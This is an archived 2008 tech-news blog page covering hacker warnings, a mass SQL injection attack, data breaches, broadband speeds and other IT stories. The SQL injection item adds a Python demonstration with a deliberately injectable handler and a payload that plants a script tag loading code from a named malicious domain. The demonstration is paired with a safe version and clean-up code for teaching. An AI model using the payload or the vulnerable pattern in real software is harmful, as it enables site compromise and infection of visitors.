Archive for April, 2008

Hackers warn high street chains

High street chains will be the next victims of cyber terrorism, some of the world’s elite hackers have warned.

They claim it is only a “matter of time” before the likes of Tesco and Marks & Spencer are targeted.

Criminals could use the kind of tactics which crippled Estonia’s government and some firms last year, they warned.

The experts were members of the infamous “Hackers Panel” which convened in London this week at the InfoSecurity Europe conference.

The panel includes penetration testers and so-called “white hat” hackers, who help companies tighten up their digital security by searching for flaws in their defences.

Previous panellists include Gary McKinnon, known as Solo, alleged by the US government to have hacked into dozens of US Army, Navy, Air Force, and Department of Defense computers.

The “hackers” usually remain anonymous, “for security reasons”, but this year’s panellists agreed to break cover.

Common cause

First up was Roberto Preatoni, the founder of the cyber crime monitoring site, Zone-H, and WabSabiLabi, a trading site for security researchers.

His appearance came just a few months after he was arrested by Italian authorities on charges of hacking and wiretapping, as part of the ongoing investigation into the Telecom Italia scandal.

Mr Preatoni told the audience that the attacks in Estonia were a harbinger for a new era of cyber warfare.

“I’m afraid we will have to get used to this,” said Mr Preatoni, also known as SyS64738. “We had all been waiting for this kind of attack to happen.

“Estonia was just unfortunate to be the first country to experience it. But very soon, our own [western] companies and countries will be getting attacked for political and religious reasons.

“This kind of attack can happen at any time. And it will happen.”

During the two week “cyber war” against Estonia, hackers shut down the websites of banks, governments and political parties using “denial-of-service” (DoS) attacks, which knock websites offline by swamping servers with page requests.

As many of the attacks originated from Russia, the Estonian government pointed the finger at the Kremlin. But Mr Preatoni said that, having spoken to contacts in the hacking community, he was clear that “Putin was not involved”.

“In my opinion, this was a collection of private individuals who spontaneously gathered under the same flag.

“Even though Estonia is one of the world’s most advanced countries in IT technology, the whole economy was brought to its knees.

“That’s the beauty of asymmetric warfare. You don’t need a lot of money, or an army of people. You can do it from the comfort of your living room, with a beer in your hand.”

His warning was echoed by Steve Armstrong, who teaches seminars in hacking techniques, at the SANS Institute for information security training.

“If someone wants to have a pop at the UK, they are unlikely to go for the government web servers. They will go for the lower hanging fruit – companies which are seen as good representatives of the country.

“The likes of Tesco, Marks & Spencer and B&Q can be seen as legitimate targets.

“We have to get the message across to companies [to invest in information security].

“At the moment Chief Executives are only interested in the bottom line. But remember – if tesco.com goes down, that’s a lot of shopping.”

Mr Preatoni said that the Estonian government’s repeated failure to thwart the attacks was proof that we still have “no good solutions” for denial of service attacks.

The panellists then argued over whether Internet Service Providers should do more to tighten security, by helping customers protect their computers from being “zombified” by hackers for use in distributed DoS attacks.

“Actually, I don’t think the ISPs should have any role in security,” said Preatoni.

“In my opinion, that’s like asking the Royal Mail to be responsible for the quality of your post.”

But his view was immediately challenged by the third panellist, Jason Creasey, head of research at the independent Information Security Forum.

“I believe ISPs can play a phenomenal role in security, with a little bit of legal pressure,” he claimed.

Net weakness

He was backed by an audience member, Angus Pinkerton, of Lynks Security Consulting. “The only way to defend against a distributed attack is with a distributed defence,” he argued.

“I think it’s unacceptable that ISPs are content to let their customers be part of bot-nets.”

He challenged Steve Armstrong’s view that asking ISPs to perform security duties was “fundamentally, censorship.”

“This is not about free speech,” said Mr Pinkerton. “Free speech does not entitle you to shout fire in a crowded theatre.”

In the meantime, Mr Preatoni warned the audience it is “only going to get easier” to carry out a DoS attack, because he claimed the latest net address system, known as Internet Protocol Version 6 (IPv6), is actually more amenable to DoS.

Later, he told the BBC that the rise in cyber attacks originating in China was a convenient cloak for western countries to disguise their own cyber espionage activities.

“It’s too easy to blame China,” he said. “In fact, legitimate countries are bouncing their attacks through China. It’s very easy to do, so why not?

“My evil opinion is that some western governments are already doing this.”


Hackers infect half a million websites

UK Government websites are among half a million pages infected by hackers in a huge and well organised SQL injection attack.

SQL injection involves inserting malicious code into websites by entering SQL queries into input boxes, such as search or comment fields. Infected websites can then infect any users visiting the site.

“As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it’s crucial to verify what information gets stored in or requested from those databases – especially if you allow users to upload content themselves,” warns a blog post from F-Secure. “Unless that data is sanitised before it gets saved you can’t control what the website will show to the users.”

The company searched Google for a string indicating that a site has been infected, and found that 510,000 sites were affected. Among those were UN sites and the UK Civil Service careers site.

The injected code adds a link to every text field in the database, which in turn inserts malicious JavaScript into the source code of the page. Three domains have been found to host the code: nmidahena.com, aspder.com and nihaorr1.com.

F-Secure suggests that site owners search their site for links to the JavaScript and remove them before any users are infected. Sanitising any data sent to the database by users will prevent similar attacks in the future.
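As an added illustration (not code from the article or from F-Secure), the Python below models the pattern described: a search handler that splices the user's term into its SQL and so executes an appended UPDATE tagging every text field with a remote script, the parameterised handler that treats the same input as data, and the scan-and-clean step F-Secure recommends, keyed on the three domains named above. The table, columns, script path and payload are constructed for the demonstration.

```python
import re
import sqlite3

# The three hosting domains named in the article; all else is constructed.
INJECTED_DOMAINS = ("nmidahena.com", "aspder.com", "nihaorr1.com")
DOMAIN_ALT = "|".join(map(re.escape, INJECTED_DOMAINS))
SCRIPT_RE = re.compile(r'<script[^>]*\ssrc=["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)
STRIP_RE = re.compile(r'<script[^>]*//(?:%s)[^>]*>\s*</script>' % DOMAIN_ALT, re.I)


def make_db():
    """Constructed stand-in for a site's content tables (in-memory SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages (title, body) VALUES
            ('Careers', 'Current vacancies'),
            ('Contact', 'How to reach us');
    """)
    return conn


def search_vulnerable(conn, term):
    """'Before' form: the search term is spliced into the SQL text and the
    result is run as a script, so a term that closes the quote and appends
    statements gets them executed with the site's database rights."""
    conn.executescript("SELECT title FROM pages WHERE title LIKE '%" + term + "%';")


def search_safe(conn, term):
    """Hardened form: the term is a bound parameter, so quotes and
    semicolons inside it are data and cannot alter the statement."""
    cur = conn.execute("SELECT title FROM pages WHERE title LIKE ?", ("%" + term + "%",))
    return [row[0] for row in cur]


def text_columns(conn):
    """Yield (table, column) for every TEXT column, as a clean-up job would."""
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        for col in conn.execute(f"PRAGMA table_info({table})"):
            if col[2].upper() == "TEXT":
                yield table, col[1]


def find_injected_links(conn):
    """Scan every text field for <script src> tags pointing at the listed
    domains. Identifiers come from the schema, never from user input."""
    hits = []
    for table, column in text_columns(conn):
        for rowid, value in conn.execute(f"SELECT rowid, {column} FROM {table}"):
            for m in SCRIPT_RE.finditer(value or ""):
                if m.group(1).lower() in INJECTED_DOMAINS:
                    hits.append((table, column, rowid, m.group(1).lower()))
    return hits


def remove_injected_links(conn):
    """Strip the injected tags from each affected field; returns fields fixed."""
    hits = find_injected_links(conn)
    for table, column, rowid, _ in hits:
        (value,) = conn.execute(f"SELECT {column} FROM {table} WHERE rowid=?", (rowid,)).fetchone()
        conn.execute(f"UPDATE {table} SET {column}=? WHERE rowid=?", (STRIP_RE.sub("", value), rowid))
    return len(hits)


def demo():
    """Returns (fields tagged via vulnerable handler, via safe one, cleaned, left)."""
    payload = ("x%'; UPDATE pages SET body = body || "
               "'<script src=\"http://nihaorr1.com/example.js\"></script>'; --")
    hit, safe = make_db(), make_db()
    search_vulnerable(hit, payload)     # appended UPDATE tags every row's body
    search_safe(safe, payload)          # same input, treated purely as data
    tagged = len(find_injected_links(hit))
    return tagged, len(find_injected_links(safe)), remove_injected_links(hit), len(find_injected_links(hit))
```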

Source – PC Pro


Brymau Estates make the Smart choice

Brymau Estates Ltd, a local multi tenant workspace provider have chosen Smart Info Tech Ltd as their preferred IT services provider.

Speaking yesterday, MD Barry Weaver spoke of his delight to be working with Brymau Estates Ltd.
“Brymau Estates Ltd are one of Chester’s best known businesses and have a huge portfolio of quality office accommodation”.
“Redhill House in Saltney is one of their best known sites and has over 50 offices and workshops. That’s not to mention their other sites based at The Sidings, Riverside House, Penrhos Manor, Great Weston House and Mallard House!”
“We obviously can’t wait to get started and are looking forward to a long and mutually beneficial relationship”.

For more information on Brymau Estates Ltd visit – www.brymauestates.co.uk


Customer data ‘needs protection’

Companies and public bodies are not doing enough to protect customers’ data, the UK’s privacy watchdog and a major survey of security have said.

The Information Commissioner said that the 94 security breaches reported to him last year was an “alarming” number.

The survey of more than 1,000 firms suggested that almost 90% of them let staff leave offices with potentially confidential data stored on USB sticks.

Firms and public bodies were urged to make data protection a priority.

Information Commissioner Richard Thomas said of the 94 data breaches, two thirds were committed by government or other public sector bodies.

Data had been recovered in only three of the 94 cases, he said.

The material included personal details of UK citizens, including health records.

“The evidence shows that more must be done to eradicate inexcusable security breaches,” he said.

Mr Thomas’ findings and the separate Information Security Breaches Survey will be detailed at the InfoSec show in London, the world’s largest event of its kind.

The survey was carried out by PricewaterhouseCoopers on behalf of the Department for Business, Enterprise and Regulatory Reform.

According to the survey, almost 80% of firms that had reported a stolen computer had not encrypted data on the hard drive.

Chris Potter, from PricewaterhouseCoopers, which compiled the survey, told BBC News that overall attitudes to security had improved in the last 12 months.

System failures

“Companies have focused on the areas which have caused them most damage in the past, such as viruses and system failures.

“These tend to have caused the greatest cost in terms of business interruption.”

But he said the “biggest concern is around the protection of customer data, which companies clearly want to be good at.

“Sometimes that’s not translating into real action.”

He said particular threats were around the lack of encryption of data on laptops, the use of USB memory sticks and newer technologies like Voice over Internet Protocol.

“In all these areas the controls are not as strong as they are over traditional threats,” he said.

Mr Potter’s comments were echoed by those of the Information Commissioner.

Mr Thomas said: “The government, banks and other organisations need to regain the public’s trust by being far more careful with people’s personal information.

“Once again I urge business and public sector leaders to make data protection a priority in their organisation.”

Of the total reported to the commissioner, 62 security breaches were in the public sector, 28 were in the private sector and four in the charity or third sector.

Of those reported by public sector bodies, almost a third happened in central government and associated agencies, and a fifth in the NHS.

According to the PricewaterhouseCoopers report, fewer companies today are encrypting data on laptops than two years ago, despite a recent spate of high-profile instances of laptop losses with unencrypted information.

Mr Potter said: “We have seen in successive surveys that companies tend to be very good with preventing yesterday’s problems. Companies need to stay on their toes to make sure they are addressing tomorrow’s problems.”

The report found that the number of attempts to hack into company networks had risen dramatically over the last two years.

“What is a really big concern is the proportion of large businesses that say hackers have got into their networks,” said Mr Potter.

Two years ago one percent of large businesses reported a hacker penetration compared to 13% in the current report.

The survey also said that figure was likely to be under-reported because many large firms did not admit to successful hacks on their networks.

Security breaches cost UK business several billion pounds a year, said the report.


BT backtracks on 21CN broadband speeds

BT has backtracked on claims that half the country will receive speeds of 12Mb/sec or greater on its new 21CN network.

Whilst briefing journalists at its Gatwick headquarters last month, BT Wholesale’s managing director of products and strategy, Cameron Rejali, told us that “We think 50% of lines will have 12Mb/sec or better,” under 21CN.

But PC Pro subsequently discovered that just weeks before, BT Wholesale had told ISPs that its lab tests revealed 50% of households would only be expected to achieve speeds of at least 6.3-9.3Mb/sec. The figures were published on the BT Wholesale website, from a meeting held with ISPs on 13 February.

When PC Pro first asked BT why there was such a large discrepancy between what the company had told ISPs and what Rejali had told journalists, a spokesperson told us the data on the website was old.

However, BT has this week admitted to PC Pro that the figures are indeed the latest available data and has attempted to distance itself from Rejali’s earlier remarks.

“I can confirm that the figure which states that 50% of UK households can expect to achieve speeds of 6.3-9.3Mb/sec is the latest lab trial data,” a spokesperson told us. “However, it is very difficult to predict the actual speeds that customers will receive once WBC [BT Wholesale Broadband Connect] is rolled out on a nationwide scale.

“Testing and trialling continues and estimates of line rates and coverage may change. For example, customers that today take the DSL Max service (up to 8Mb/sec) are receiving higher line speeds than were predicted during the DSL Max trial, hence Cameron’s comments that 50% of UK households could well achieve higher speeds than the current lab trial data indicates.”

When we pressed the spokesperson on what figure BT thinks is now the most reliable indicator of what customers are likely to receive, she said “we should go with the 6.3-9.3Mb/sec figure”.

ISPs who have been working closely with BT on the 21CN trials have told PC Pro that they too don’t expect most customers to achieve anything close to the headline speeds. “Not many are going to get anywhere near 24Mb/sec,” James Blessing, chief operating officer of Entanet told us.

“If you’re getting above four meg [currently] you’ll see an increase. If you’re getting below four meg, some people actually get a slight decrease.”

Those views are echoed by Thinkbroadband.com, which has researched the speeds customers can expect using ADSL2+ on BT’s new network. “Those who go fast now are going to go even faster,” says site editor, Andrew Ferguson. “Those on 1-1.5Mb/sec are going to see perhaps half a meg extra.”

BT WHOLESALE’S 21CN SPEED ESTIMATES

% of UK households    Expected to achieve speeds of at least
(Max)                 12.3-16.3Mb/sec
10%                   12.1-16.2Mb/sec
25%                   10.9-14.7Mb/sec
50%                   6.3-9.3Mb/sec
75%                   3.3-5.0Mb/sec

Source: PC Pro


Cheshire councillor banned from computer

A CITY councillor has had his access to the Chester City Council’s computer network temporarily denied after being accused of sending inappropriate emails.

Cllr Max Drury, 60, has already said sorry to Lib Dem group leader Paul Roberts (Farndon) and his wife as well as Cllr Gwyneth Cooper (Lab, City & St Anne’s), Cllr Paul Cheetham (Lib Dem, Vicars Cross) and “anyone” else offended.

City council spokesman Mike McGivern said: “Chester City Council has temporarily withdrawn its Information & Communications Technology (ICT) service from Councillor Max Drury. We are in discussions with him to reinstate his ICT connection as soon as is practical.

“Anyone wishing to contact Councillor Drury via the city council’s e-mail system should email: memberservices@chester.gov.uk.”

Cllr Drury (Curzon & Westminster) got embroiled in the saga after responding to a round-robin e-mail inviting members on a site visit to a colleague’s ward.

In an unrelated matter, Cllr Drury was arrested on March 2 on suspicion of breaching a harassment order.

Cllr Drury has not been selected by the Conservatives to stand for Overleigh – which covers the area he currently represents – but will be standing for City ward in elections for the new West Cheshire and Chester Council on May 1.

Cllr Drury was not available for comment.

Source – Mar 13 2008 by David Holmes, Chester and Cheshire Chronicle


Cheshire parents get chance to catch up

PARENTS are being given a chance to bridge the gap between their children’s and their own computer skills.

A new course at Whitchurch Junior School is making sure young technology whizzes can no longer put the older generation to shame!

Family learning tutor Sally Whelan of Shropshire County Council visits the school every week to work with a group of seven parents.

This is her third set of sessions at the school, following earlier maths and English courses – all called Keeping up with the children.

The aim is to enhance parents’ skills and give them an understanding of the school syllabus so they can better help their children with work at home.

Headteacher Matthew Copping said: “Parents can improve their own skills, see what we do in school, and see how IT can help develop other subjects.

“For the first time, we are giving children a chance to come out of lessons to join their parents for a short slot in the sessions.”

The next Keeping up with the Children course has yet to be confirmed, but Mr Copping hopes to run another English course.

Source – Cheshire Chronicle


HSBC joins disc data disaster crowd

HSBC has become the latest organisation to lose hundreds of thousands of customer details on an unencrypted disc.

The disc contains the names, dates of birth and insurance cover details of 370,000 people who hold life assurance policies at the bank.

The disc went missing after being sent by Royal Mail courier to the bank’s insurance partner, Swiss Re in February.

Such information is normally sent over a secure internet connection, but it wasn’t working on the day.

Amazingly, given the furore surrounding Customs losing 25m personal records in near identical circumstances last November, nobody at HMRC thought it wise to encrypt the contents of the disc, relying instead on flimsy password protection.

“The data disc lost by HSBC contains no address or bank account details for any customer and would therefore be of very limited, if any, use to criminals,” HSBC claims in a statement.

HSBC has informed the Financial Services Authority (FSA) of the loss and says it will contact the affected customers.

Last year the FSA fined Norwich Union 1.26 million for exposing its customers to the risk of fraud, when it lost a laptop containing sensitive data.

Source: PC Pro


ISPs vs BBC row

Relationships between the BBC and internet industry have plunged to an all-time low, after the BBC’s internet chief Ashley Highfield used a blog post yesterday to tell ISPs to get stuffed – and even threatened to name and shame them.

The cost of carrying iPlayer traffic has been a sore point for ISPs, who must absorb steeply rising traffic costs. Regulator OFCOM’s Market Impact Assessment estimated the P2P version of iPlayer would create up to £831m in extra costs for the internet industry. In the first month of the “low bandwidth” iPlayer, ISPs saw streaming costs rise 20 per cent.

But Highfield, Director of Future Media and Technology at the £4bn-a-year corporation, said the BBC won’t help them out.

“I would not suggest that ISPs start to try and charge content providers,” he scolds.

“They are already charging their customers for broadband to receive any content they want. If ISPs start charging content providers, the customer will not know which content will work well over their chosen ISP, and what content may have been throttled for non-payment of a levy.”

Highfield instead advises them to pass the increased costs onto their customers in the form of tiers of service (ie price increases).

And if ISPs didn’t follow his “advice”, and dared to traffic shape their networks to manage their bandwidth hogs, Highfield threatened that the BBC would name and shame them.

“Content providers, if they find their content being specifically squeezed, shaped, or capped, could start to indicate on their sites which ISPs their content worked best on (and which to avoid). I hope it doesn’t come to this, as I think we (the BBC and the ISPs) are currently working better together than ever.”

Being put on the BBC’s List of Shame could have serious commercial repercussions for internet providers.

(Highfield also raised eyebrows with his assertion that “The best technical solution is usually Moore’s law”. An oddly ignorant thing to say, since the capacity and price of copper and fibre connections have very little to do with the density of transistors on a semiconductor die. Earth to Ashley: Ceci n’est pas une pipe.)

It’s a lose-lose situation for the ISPs. If they refuse to carry iPlayer material, they lose customers and go out of business. If they do carry iPlayer material, and traffic shape their networks, the BBC will shame them, and they go out of business. Who’d be an ISP?

Highfield’s heavy-handed intervention may undo much of the conciliatory work undertaken by iPlayer boss Anthony Rose. As we reported recently, the BBC is exploring building its own Content Delivery Network (CDN) to ease the delivery costs for ISPs.

One executive at a major ISP stormed back at Highfield:

“Relying on the customer’s failure to read the small print is not the basis for a digital content strategy.”

Source: The Register


Vista who?

Windows 7 could be arriving much sooner than anticipated, according to none other than Bill Gates.

When asked about the progress of Windows Vista during a speech at the Inter-American Development Bank, Gates told the audience: “Sometime in the next year or so we will have a new version,” according to a report on CNet.com.

It’s not clear whether Gates was referring to the full commercial launch of the new operating system or merely a beta version, but either way it seems the development of Windows 7 is progressing rapidly. Last month it was revealed that Microsoft had sent a test version of Windows 7 to the US government, indicating that the operating system is already in a working state. Microsoft has previously stated that Windows 7 would launch three years after the 2007 release of Vista.

And Gates gave further encouragement to those who are hoping for an upturn in fortunes, after the muted response to Windows Vista. “I’m super-enthused about what it will do in lots of ways,” he said of Windows 7.

Microsoft has remained tight-lipped on what features can be expected from the next version of Windows, leading some to speculate that the company is attempting to follow Apple’s practice of divulging little about new operating systems until launch.

A wishlist of potential Windows 7 features was leaked last November, although Microsoft refused to confirm or deny that any of the 61 features would make it into the final code.

Source – PC Pro